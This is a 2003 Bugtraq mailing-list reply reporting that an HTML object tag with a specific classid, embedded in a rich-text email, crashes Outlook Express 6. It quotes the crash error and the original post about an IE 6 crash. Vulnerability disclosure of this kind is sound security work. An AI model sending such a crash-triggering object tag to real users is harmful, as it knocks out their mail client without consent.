
Date: Thu, 17 Apr 2003 11:03:25 -0700
From: "Geoff Shively" <gshively@...x.com>
To: "Adam [ckkl]" <ckkl@...zta.wp.pl>, <bugtraq@...urityfocus.com>
Subject: Re: IE 6.0 - trivial crash


Adam,
If you paste the code within the object tag you specified into a rich text
html email, MSIMN will crash:

<>
 id=crash
 classid="clsid:00022613-0000-0000-C000-000000000046"
 width=1
 height=1
<>

Outlook Express 6 [6.00.2800.1106] will crash with the following error:

--------
MSIMN.exe - Application Error

The instruction at "0x000b01b8" referenced memory at "0x39f1be78". The
memory could not be "read".
---------

Cheers,
Geoff Shively
PivX Solutions

http://www.pivx.com



----- Original Message -----
From: "Adam [ckkl]" <ckkl@...zta.wp.pl>
To: <bugtraq@...urityfocus.com>
Sent: Wednesday, April 16, 2003 3:17 PM
Subject: IE 6.0 - trivial crash


> Hello,
>
> Nothing to add, just a trivial IE crash.
> http://www.sztolnia.pl/hack/TrivialIECrash/TrivialIECrash.html
>
> Best Regards
> Adam Blaszczyk
> reverser, coder, writer & researcher  [VX/AV]
> http://www.symantec.com (Localization Engineer)
> http://www.mykakee.com (Home page)
> Whatever I say in this e-mail is my private opinion.



